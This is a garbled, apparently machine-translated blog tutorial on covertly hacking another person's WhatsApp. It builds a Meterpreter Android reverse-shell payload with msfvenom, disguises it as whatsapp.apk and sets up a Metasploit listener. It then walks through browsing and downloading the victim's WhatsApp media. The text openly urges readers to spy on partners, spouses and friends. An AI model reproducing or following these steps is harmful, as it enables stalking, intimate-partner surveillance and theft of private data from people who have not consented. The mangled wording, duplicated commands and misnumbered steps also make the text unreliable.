Today I will tell you how to log into a Whatsapp account for anyone using meterpreter Android Payload, we run this process on our local network, and you can try this method online, but you need a fixed IP address and the second option uses. third party tool. But today we are running the process on our local network


We will do all this process on our Linux system, in which we must first copy some instructions as well. create a load to put on your friend's cell phone and not be able to hack all your data

Also Read : Create & Host Your Own Dark Web Onion Website on Termux & Linux

Whatsapp, one of the most popular instant messaging forums. Why is this so popular? In addition to free features, you can send photos, audio, documents, even make voice and video calls and get instant responses. In this article, we will reveal how to hack someone's WhatsApp account. These days, everyone wants to know what someone is doing on their WhatsApp account all day.

Do you want to keep an eye on your friend, boyfriend, girlfriend, husband, and wife Whatsapp? Here is a simple trick to hijack a Whatsapp account. However, this may be easier for most users. You have to do this simple strategy. Just follow the steps below.


how to hack whatsapp with termux program - There are many ways to hack whatsapp that are streamed online, because the Internet is a place or place of useful information on the Internet, which is currently available. One of the many users who want in the world of technology, namely: how to hack whatsapp With Termux from other people so that we can know the chat content through our smartphone.


A number of guidelines on many sites or websites and some people share how to hack whatsapp on social media, it has negative and positive effects, so doing something like this can really hurt someone. Because if WhatsApp Hack becomes successful, it will have a huge impact on the official WhatsApp company, because users will later see that the security features of the app are very low and many users are lazy to use it.

Also Read : How to Android Phone hijack Using Virus for Prank you Friend

But for those who take the initiative to click on WhatsApp, the good result is that they can find out the secret of the abusive partner’s partner, as well as dating right now. This step to touch whatsapp can be a simple step to show the infidelity of a lover, husband and wife, where now if he behaves strangely and acts like a hidden person of our partner, then This is the right way to view the content of conversations on WhatsApp


There is one trick you can try to touch on WhatsApp by 2022, and this WA tapping app has given success to those who use it. So what I use is called termux Hack whatsapp application.


Now for those of you who are curious about what your partner is doing using WhatsApp, you can use the WhatsApp tap method using Termux. And soon, here is the full review below.



Install Metasploit in Termux App :

Also Read : How to Install Metasploit in Termux Without any Error 2022


Start Metasploit :

Step 1 :- Let’s open your Kali Linux Terminal and run the ifconfig command for checking our local machine IP address.

 ifconfig


Step 2 :- Now we have our local machine IP address, in my case my local machine IP is 10.0.2.15, in your case your IP address is different, After get the machine IP we need to create a msfvenom Android Payload let’s run this command for creating android reverse Payload.

msfvenom -p android/meterpreter/reverse_tcp lhost=<IP> lport=<use any port> R > whatsapp.apk
 msfvenom -p android/meterpreter/reverse_tcp lhost=<IP> lport=<use any port> R > whatsapp.apk

 


Step 3 :- After clicking the Insert keyboard our paid download is successfully produced now we need to start our Metasploit payload listener use the msfconsole command.

You have been told what the size of your load is.

Now we have to put the paid charge on our friend's phone and install it. After installing the paid load you must unlock it.

msfconsole

 

Step 4 :- Our Metasploit framework requires us to download android meterpreter reverse payload using the multi-hander exploit.

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp




Step 5 :- Now set the IP address of your local machine, After setting the IP address of the host I directed to exploit payments, if you use a different port for your paid upload you need to change your lport you can change your lport using the default lport command <>

set lhost (YOUR IP)
exploit



Step 6 :- Now our perverted TCP provider is required to send a paid load to your target cell phone and process the charge you pay to the target Monile.

After opening the android payload we will get a meterpreter session as we see in the picture.


Step 4 :- After receiving the session we can use any Linux command and change our current operating system using this command.

 cd sdcard
 ls -l

Step 7 :- We are now inside the targeted mobile phone and are converting our sdcard reference into WhatsApp Directory. 

Here we can see our target Whatsapp Files and directory let's move to Media direction.


 Using This Cammand Android 7 - 9 Version 

       Android 7 - 9
cd WhatsApp
ls -l
cd Media
ls -l


 Using This Cammand Android 10 - 12 Version 

       Android 10 -12
cd Android
cd media
cd com.whatsapp
cd WhatsApp
cd Media
ls -l


Step 8 :- After reaching the media folder, we can see the ALL media folder now I will download our targeted Whatsapp photos and change the index using this command.

cd WhatsApp\ Images
ls -l


Step 9 :- You can see here your target Whatsapp image you can use the ls command to list all the photos and you can download any image file using the download command.

download (YOUR FILE NAME)



After the image is in a folder, you must type the file name you want to download behind the file. Using this method you can download media, documents, etc.

To see the conversations you need to download your victim's database, I will do another tutorial for this. I hope you are learning something from this study